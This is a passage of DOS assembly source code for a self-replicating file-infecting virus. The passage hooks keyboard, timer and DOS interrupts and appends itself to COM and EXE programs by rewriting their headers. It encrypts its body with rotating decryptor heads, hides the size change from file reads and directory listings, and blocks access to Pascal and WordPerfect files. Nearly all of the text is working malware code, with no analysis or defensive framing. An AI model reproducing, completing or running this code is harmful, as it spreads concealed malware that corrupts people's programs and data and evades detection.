;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B><><EFBFBD> Timer Tick (Int 1Ch) Handler <20>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
tmr_rout:
|
|||
|
pushf
|
|||
|
|
|||
|
cmp cs:bb_stat,0
|
|||
|
je tmr_b1
|
|||
|
|
|||
|
push ax
|
|||
|
push dx
|
|||
|
|
|||
|
mov dx,3DAh
|
|||
|
in al,dx
|
|||
|
mov dx,3BAh
|
|||
|
in al,dx
|
|||
|
mov dx,3C0h
|
|||
|
mov al,0
|
|||
|
out dx,al ;0 = off, 32 = on
|
|||
|
|
|||
|
pop dx
|
|||
|
pop ax
|
|||
|
tmr_b1:
|
|||
|
popf
|
|||
|
db 0EAh
|
|||
|
oldh dw 0,0 ;Old TIMER-TICK vector
|
|||
|
|
|||
|
enc_data db 011h,009h,00Dh,0E8h,000h,000h,05Eh,081h,0C6h,00Eh,000h,0B9h,000h
|
|||
|
db 000h,080h,034h,000h,046h,0E2h,0FAh,013h,009h,00Fh,0E8h,000h,000h
|
|||
|
db 05Bh,081h,0C3h,010h,000h,0B9h,000h,000h,033h,0F6h,080h,030h,000h
|
|||
|
db 046h,0E2h,0FAh,015h,004h,012h,0E8h,000h,000h,0B9h,000h,000h,089h
|
|||
|
db 0E5h,081h,046h,000h,012h,000h,05Eh,046h,080h,074h,0FFh,000h,0E2h
|
|||
|
db 0F9h,015h,001h,012h,0B9h,000h,000h,089h,0E5h,0E8h,000h,000h,081h
|
|||
|
db 046h,0FEh,00Dh,000h,05Bh,043h,080h,077h,0FFh,000h,0E2h,0F9h,016h
|
|||
|
db 001h,013h,0B9h,000h,000h,08Bh,0DCh,0E8h,000h,000h,036h,081h,047h
|
|||
|
db 0FEh,00Eh,000h,05Bh,043h,080h,077h,0FFh,000h,0E2h,0F9h,019h,001h
|
|||
|
db 016h,0B9h,000h,000h,08Bh,0DCh,0E8h,000h,000h,083h,0EBh,004h,036h
|
|||
|
db 081h,047h,002h,011h,000h,05Fh,047h,080h,075h,0FFh,000h,0E2h,0F9h
|
|||
|
db 01Dh,009h,014h,0FCh,0EBh,002h,0C6h,006h,0E8h,000h,000h,0B9h,000h
|
|||
|
db 000h,05Eh,081h,0C6h,015h,000h,0EBh,001h,0CDh,0B4h,000h,0ACh,032h
|
|||
|
db 0C4h,088h,044h,0FFh,0E2h,0F8h
|
|||
|
|
|||
|
encr_h_ofs dw 0
|
|||
|
encr_h_cx db 0
|
|||
|
encr_h_xor db 0
|
|||
|
encr_h_len db 0
|
|||
|
|
|||
|
repl0: db 0E8h,0,0
|
|||
|
repl1: jmp near 0100h
|
|||
|
|
|||
|
patch_it:
|
|||
|
push di
|
|||
|
push si
|
|||
|
push ds
|
|||
|
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
|
|||
|
mov marker,0
|
|||
|
|
|||
|
cmp word [ofs_first_3],'MZ'
|
|||
|
je exe_calc
|
|||
|
cmp word [ofs_first_3],'ZM'
|
|||
|
je exe_calc
|
|||
|
|
|||
|
mov ax,f_size
|
|||
|
sub ax,3
|
|||
|
mov repl0[1],ax
|
|||
|
|
|||
|
mov ax,word [ofs_first_3]
|
|||
|
mov dl,byte [ofs_first_3+2]
|
|||
|
|
|||
|
mov [offset rpl1],ax
|
|||
|
mov [offset rpl2],dl
|
|||
|
jmp j_encrypt
|
|||
|
|
|||
|
oldl0 dw 0
|
|||
|
oldl2 dw 0
|
|||
|
|
|||
|
exe_calc:
|
|||
|
mov ax,4202h
|
|||
|
xor cx,cx
|
|||
|
xor dx,dx
|
|||
|
call int21
|
|||
|
|
|||
|
mov oldl0,ax
|
|||
|
mov oldl2,dx
|
|||
|
|
|||
|
push ax
|
|||
|
push dx
|
|||
|
|
|||
|
mov ax,word [header+16h]
|
|||
|
add ax,10h
|
|||
|
mov word [exe_cpt1],ax
|
|||
|
mov ax,word [header+14h]
|
|||
|
mov word [exe_cpt2],ax
|
|||
|
|
|||
|
pop dx
|
|||
|
pop ax
|
|||
|
push ax
|
|||
|
push dx
|
|||
|
|
|||
|
add ax,ideal
|
|||
|
adc dx,0
|
|||
|
|
|||
|
; mov ax,oldl0
|
|||
|
mov cx,512
|
|||
|
div cx
|
|||
|
inc ax
|
|||
|
mov word [header+4],ax
|
|||
|
mov word [header+2],dx
|
|||
|
|
|||
|
pop dx
|
|||
|
pop ax
|
|||
|
|
|||
|
mov cx,16
|
|||
|
div cx
|
|||
|
sub ax,word [header+8]
|
|||
|
mov word [header+16h],ax
|
|||
|
mov word [header+14h],dx
|
|||
|
|
|||
|
mov marker,1
|
|||
|
|
|||
|
j_encrypt:
|
|||
|
call encrypt ;encrypt & write
|
|||
|
sahf
|
|||
|
jc no_write_1st
|
|||
|
|
|||
|
mov ax,4200h
|
|||
|
xor cx,cx
|
|||
|
mov dx,cx
|
|||
|
call int21
|
|||
|
|
|||
|
cmp marker,1
|
|||
|
je exe_jump
|
|||
|
|
|||
|
mov ah,40h
|
|||
|
mov cx,3
|
|||
|
mov dx,offset repl0 ;write "CALL" head
|
|||
|
call int21
|
|||
|
jmp alldone
|
|||
|
|
|||
|
exe_jump: mov ah,40h
|
|||
|
mov cx,18h
|
|||
|
mov dx,ofs_first_3
|
|||
|
int 21h
|
|||
|
alldone:
|
|||
|
and byte cs:[ofs_time],255-31
|
|||
|
or byte cs:[ofs_time],sec
|
|||
|
no_write_1st:
|
|||
|
pop ds
|
|||
|
pop si
|
|||
|
pop di
|
|||
|
sahf
|
|||
|
jmp _call0; ret
|
|||
|
|
|||
|
;db 'Blessed is the one who expects nothing, for he shall not be dissapointed$'
|
|||
|
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B><><EFBFBD> Encrypt & Write <20>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
encrypt:
|
|||
|
push ds ;Save DS & ES
|
|||
|
push es
|
|||
|
|
|||
|
push cs ;DS = ES = CS
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
pop es
|
|||
|
|
|||
|
push bx ;Save BX
|
|||
|
|
|||
|
cld
|
|||
|
call choose_encryption_head ;Choose encryption head
|
|||
|
get_enc_key:
|
|||
|
db 0E4h,40h
|
|||
|
cmp al,0
|
|||
|
je get_enc_key
|
|||
|
|
|||
|
mov bh,0 ;BH = 0
|
|||
|
mov bl,encr_h_xor ;BL = internal XOR-ofs
|
|||
|
mov byte [si+bx],al ;b [Si+Bx] = Encr. key
|
|||
|
mov bl,encr_h_cx ;BL = internal CX-ofs
|
|||
|
mov word [si+bx],offset total-10Ah ;w [Si+Bx] = Encr.length
|
|||
|
xchg di,ax ;DI = AX
|
|||
|
|
|||
|
pop bx
|
|||
|
push bx
|
|||
|
|
|||
|
push ax
|
|||
|
push di
|
|||
|
cld
|
|||
|
mov di,offset total
|
|||
|
mov cx,2048
|
|||
|
mov al,'<27>'
|
|||
|
rep stosb
|
|||
|
pop di
|
|||
|
|
|||
|
xor ch,ch
|
|||
|
mov cl,encr_h_len
|
|||
|
add cx,offset total-100h
|
|||
|
xchg cx,ax
|
|||
|
mov cx,ideal
|
|||
|
sub cx,ax
|
|||
|
mov ah,40h
|
|||
|
mov append,cx
|
|||
|
mov dx,offset total
|
|||
|
mov word [total],1F0Eh
|
|||
|
call int21
|
|||
|
pop ax
|
|||
|
|
|||
|
mov ah,40h ;Write to handle
|
|||
|
pop bx ;restore handle number
|
|||
|
xor ch,ch ;CH = 0
|
|||
|
mov cl,encr_h_len ;CL = Length of de-garbler
|
|||
|
mov dx,si ;DX = Offset to de-garbler-head
|
|||
|
call int21 ;Call DOS
|
|||
|
|
|||
|
lahf ;AH = FLAGS
|
|||
|
cmp al,cl ;All bytes written?
|
|||
|
je success ;yes, then degarbler written
|
|||
|
|
|||
|
sahf ;FLAGS = AH
|
|||
|
jnc success ;If no error, then...
|
|||
|
stc ;...set CY, and...
|
|||
|
ret ;...return.
|
|||
|
success:
|
|||
|
xchg di,ax ;DI = AX
|
|||
|
xchg al,ah ;Exchange AL with AH
|
|||
|
mov si,100h ;SourceIndex = 100h
|
|||
|
mov di,offset total ;DI = End-Of-Code
|
|||
|
mov cx,offset total-11Fh ;Encryption length
|
|||
|
encrypt_l:
|
|||
|
lodsb ;al = [SI], si: +1
|
|||
|
xor al,ah ;garble byte
|
|||
|
stosb ;[DI] = al, di: +1
|
|||
|
loop encrypt_l ;and again....
|
|||
|
|
|||
|
xor cx,cx
|
|||
|
mov cl,encr_h_len
|
|||
|
add cx,(offset total)-100h
|
|||
|
add cx,append
|
|||
|
mov size,cx
|
|||
|
|
|||
|
mov cx,31 ;the last bytes remain
|
|||
|
rep movsb ;degarbeled
|
|||
|
|
|||
|
mov ah,40h ;Write to handle
|
|||
|
mov cx,offset total-100h ;CX = Bytes
|
|||
|
mov dx,offset total ;DX = Garbeled code
|
|||
|
call int21 ;Call Dos
|
|||
|
clc
|
|||
|
lahf
|
|||
|
cmp al,cl ;all bytes written?
|
|||
|
je encr_b1
|
|||
|
stc
|
|||
|
lahf
|
|||
|
encr_b1:
|
|||
|
pop es ;restore ES & DS
|
|||
|
pop ds
|
|||
|
sahf
|
|||
|
ret ;return
|
|||
|
|
|||
|
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B><><EFBFBD> Choose which encryption-head to use with this generation, and store <20>
|
|||
|
;<3B><><EFBFBD> the pointer and the two internal offsets for later use. <20>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
choose_encryption_head:
|
|||
|
mov ah,2Ah ;get date
|
|||
|
call int21 ;using DOS
|
|||
|
xor ah,ah ;clear bits 9-16 of AX
|
|||
|
mov cx,ax ;copy AX into CX
|
|||
|
inc cx
|
|||
|
and cl,7
|
|||
|
mov si,offset enc_data ;point SI to Enc_Data
|
|||
|
|
|||
|
cld ;clear direction flag
|
|||
|
|
|||
|
lete_etter_enc:
|
|||
|
lodsb ;al=[si] , si=si+1
|
|||
|
add si,ax ;si = si + ax
|
|||
|
inc si ;si = si + 1
|
|||
|
inc si ;si = si + 1
|
|||
|
loop lete_etter_enc ;continue the searching ...
|
|||
|
|
|||
|
funnet_riktige:
|
|||
|
sub si,ax
|
|||
|
dec si
|
|||
|
dec si
|
|||
|
|
|||
|
mov encr_h_len,al
|
|||
|
lodsb ;load the CX offset
|
|||
|
mov encr_h_cx,al
|
|||
|
lodsb ;load the XOR offset
|
|||
|
mov encr_h_xor,al
|
|||
|
mov encr_h_ofs,si
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;db 'Eddie lives... Somewhere in time...'
|
|||
|
|
|||
|
init:
|
|||
|
cli
|
|||
|
xor ax,ax
|
|||
|
mov ds,ax
|
|||
|
mov si,9*4
|
|||
|
mov di,offset old_key
|
|||
|
movsw
|
|||
|
movsw
|
|||
|
add si,(1Ch*4)-(9*4)-4
|
|||
|
mov di,offset oldh
|
|||
|
movsw
|
|||
|
movsw
|
|||
|
add si,(21h*4)-(1Ch*4)-4
|
|||
|
mov di,offset org21
|
|||
|
movsw
|
|||
|
movsw
|
|||
|
|
|||
|
mov word [09h*4+2],cs
|
|||
|
mov word [09h*4], offset key_rout
|
|||
|
|
|||
|
mov word [1Ch*4+2],cs
|
|||
|
mov word [1Ch*4], offset tmr_rout
|
|||
|
|
|||
|
mov word [21h*4+2],cs
|
|||
|
mov word [21h*4], offset ni21
|
|||
|
sti
|
|||
|
|
|||
|
retf
|
|||
|
|
|||
|
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B><><EFBFBD> Disk Stealth: Read from handle (Int 21h,3Fh) <20>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
read:
|
|||
|
call push_all
|
|||
|
|
|||
|
mov cs:_handle,bx
|
|||
|
mov cs:_bytes,cx
|
|||
|
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
|
|||
|
mov ax,1220h
|
|||
|
push bx
|
|||
|
push ax
|
|||
|
int 2Fh
|
|||
|
mov bl,es:[di]
|
|||
|
pop ax
|
|||
|
sub al,0Ah
|
|||
|
int 2Fh
|
|||
|
pop bx
|
|||
|
|
|||
|
cmp word ptr [di+28h],'OC'
|
|||
|
jne j_dso1
|
|||
|
cmp byte ptr [di+28h+2],'M'
|
|||
|
je j_dso0
|
|||
|
j_dso1:
|
|||
|
cmp word ptr [di+28h],'XE'
|
|||
|
jne j_dso3
|
|||
|
cmp byte ptr [di+28h+2],'E'
|
|||
|
je j_dso0
|
|||
|
j_dso3:
|
|||
|
jmp phocked
|
|||
|
|
|||
|
j_dso0:
|
|||
|
push es:[di+15h]
|
|||
|
push es:[di+17h]
|
|||
|
push es:[di+2h]
|
|||
|
or byte es:[di+2],3
|
|||
|
|
|||
|
mov ax,es:[di+15h]
|
|||
|
mov pos[0],ax
|
|||
|
mov ax,es:[di+17h]
|
|||
|
mov pos[2],ax
|
|||
|
|
|||
|
mov ax,es:[di+11h]
|
|||
|
mov cx,es:[di+13h]
|
|||
|
|
|||
|
sub ax,31
|
|||
|
sbb cx,0
|
|||
|
mov es:[di+15h],ax
|
|||
|
mov es:[di+17h],cx
|
|||
|
|
|||
|
mov ah,3Fh
|
|||
|
mov cx,31
|
|||
|
mov dx,header
|
|||
|
call int21
|
|||
|
jnc read_b1
|
|||
|
read_b2:
|
|||
|
jmp done_it
|
|||
|
read_b1:
|
|||
|
cmp al,31
|
|||
|
jne read_b2
|
|||
|
cmp byte [header+18h],11
|
|||
|
jl read_b2
|
|||
|
|
|||
|
cmp word ptr [header+1Bh],'CP' ;[X_sig]
|
|||
|
jne read_b2
|
|||
|
cmp word ptr [header+1Bh+2],'BB' ;[X_sig+2]
|
|||
|
jne read_b2
|
|||
|
|
|||
|
mov si,header
|
|||
|
push cx
|
|||
|
mov cx,12
|
|||
|
decr_l8b:
|
|||
|
lodsw
|
|||
|
xor ax,'EL'
|
|||
|
xor ax,'AH'
|
|||
|
xor ax,'W&'
|
|||
|
xor ax,'HS'
|
|||
|
xor ax,'IF'
|
|||
|
mov [si-2],ax
|
|||
|
loop decr_l8b
|
|||
|
pop cx
|
|||
|
|
|||
|
cmp word ptr pos[2],0
|
|||
|
|
|||
|
jne vid4
|
|||
|
cmp word pos[0],23 ;2
|
|||
|
|
|||
|
ja vid4
|
|||
|
|
|||
|
mov stat2,1
|
|||
|
|
|||
|
mov ax,pos[0]
|
|||
|
mov bx,_bytes
|
|||
|
cmp bx,24
|
|||
|
jb vid5
|
|||
|
mov bx,24
|
|||
|
vid5:
|
|||
|
sub bx,ax
|
|||
|
mov stealth1st[0],bx
|
|||
|
vid4:
|
|||
|
mov ax,es:[di+11h]
|
|||
|
mov dx,es:[di+13h]
|
|||
|
sub ax,[header+19h] ;[x_size]
|
|||
|
sbb dx,0
|
|||
|
mov val_len[0],ax
|
|||
|
mov val_len[2],dx
|
|||
|
|
|||
|
mov bx,pos[0]
|
|||
|
mov cx,pos[2]
|
|||
|
|
|||
|
cmp cx,dx
|
|||
|
jbe vid2
|
|||
|
mov _bytes,0
|
|||
|
jmp done_it
|
|||
|
vid2:
|
|||
|
cmp cx,dx
|
|||
|
jne vid3
|
|||
|
cmp bx,ax
|
|||
|
jb vid3
|
|||
|
mov _bytes,0
|
|||
|
jmp done_it
|
|||
|
vid3:
|
|||
|
mov ax,val_len[0]
|
|||
|
mov dx,val_len[2]
|
|||
|
|
|||
|
mov bx,pos[0]
|
|||
|
mov cx,pos[2]
|
|||
|
add bx,_bytes
|
|||
|
adc cx,0
|
|||
|
|
|||
|
cmp cx,dx
|
|||
|
jae vid
|
|||
|
mov _bytes,0
|
|||
|
jmp done_it
|
|||
|
|
|||
|
vid:
|
|||
|
cmp cx,dx
|
|||
|
jne done_it
|
|||
|
|
|||
|
cmp ax,bx
|
|||
|
jae done_it
|
|||
|
|
|||
|
sub bx,ax
|
|||
|
sub _bytes,bx
|
|||
|
|
|||
|
done_it:
|
|||
|
pop es:[di+2] ;restore SFT data's
|
|||
|
pop es:[di+17h]
|
|||
|
pop es:[di+15h]
|
|||
|
phocked:
|
|||
|
call pop_all
|
|||
|
|
|||
|
mov cx,cs:_bytes ;change CX (if of any use)
|
|||
|
|
|||
|
ret ;return
|
|||
|
|
|||
|
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B><><EFBFBD> DIR Stealth <20>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
stealth_dir_handle:
|
|||
|
jc done_stealthing_handle
|
|||
|
|
|||
|
pushf
|
|||
|
call push_all
|
|||
|
|
|||
|
mov ah,2Fh
|
|||
|
call int21
|
|||
|
mov ax,word ptr es:[bx+16h]
|
|||
|
and al,31
|
|||
|
cmp al,sec
|
|||
|
jne done_stealthing_handle
|
|||
|
|
|||
|
cmp word es:[bx+1Ah],3*1024
|
|||
|
jc done_stealthing_handle
|
|||
|
sub word es:[bx+1Ah],3*1024
|
|||
|
sbb word es:[bx+1Ch],0
|
|||
|
|
|||
|
done_stealthing_handle:
|
|||
|
jmp done_stealthing_fcb
|
|||
|
|
|||
|
stealth_dir_fcb:
|
|||
|
pushf
|
|||
|
call push_all
|
|||
|
|
|||
|
mov ah,2Fh
|
|||
|
call int21
|
|||
|
|
|||
|
cmp byte es:[bx],0FFh ;extended fcb?
|
|||
|
jne no_ext_fcb
|
|||
|
add bx,7
|
|||
|
no_ext_fcb:
|
|||
|
mov al,byte ptr es:[bx+17h]
|
|||
|
and al,31
|
|||
|
cmp al,sec
|
|||
|
jne done_stealthing_fcb
|
|||
|
|
|||
|
cmp word es:[bx+1Dh],3*1024
|
|||
|
jc done_stealthing_fcb
|
|||
|
sub word es:[bx+1Dh],3*1024
|
|||
|
sbb word es:[bx+1Fh],0
|
|||
|
|
|||
|
done_stealthing_fcb:
|
|||
|
call pop_all
|
|||
|
popf
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
reset_i24: push ds
|
|||
|
push dx
|
|||
|
push ax
|
|||
|
lds dx,cs:o24[0]
|
|||
|
|
|||
|
mov ax,2524h ;restore int 24 vector
|
|||
|
call int21
|
|||
|
pop ax
|
|||
|
pop dx
|
|||
|
pop ds
|
|||
|
ret
|
|||
|
|
|||
|
wpbuff db ' '
|
|||
|
;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
|||
|
; Deny access to any PASCAL or WORD PERFECT files
|
|||
|
;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
|||
|
PAS_WP:
|
|||
|
xchg bx,ax
|
|||
|
|
|||
|
mov si,dx
|
|||
|
cld
|
|||
|
search_pas:
|
|||
|
lodsw
|
|||
|
dec si
|
|||
|
|
|||
|
cmp al,0
|
|||
|
je not_pas
|
|||
|
cmp ah,0
|
|||
|
je not_pas
|
|||
|
|
|||
|
and ax,0DFDFh
|
|||
|
|
|||
|
cmp ax,'P.' and 0DFDFh
|
|||
|
jne search_pas
|
|||
|
mov ax,word [si+1]
|
|||
|
and ax,0DFDFh
|
|||
|
cmp ax,'SA'
|
|||
|
je fuck_wp
|
|||
|
not_pas:
|
|||
|
xchg bx,ax
|
|||
|
call int21
|
|||
|
jc not_wp
|
|||
|
|
|||
|
xchg bx,ax
|
|||
|
cmp bx,5
|
|||
|
jb not_wp
|
|||
|
|
|||
|
xor si,si
|
|||
|
|
|||
|
mov ah,3Fh
|
|||
|
mov cx,3
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov dx,offset wpbuff
|
|||
|
call int21
|
|||
|
|
|||
|
jc close_wp
|
|||
|
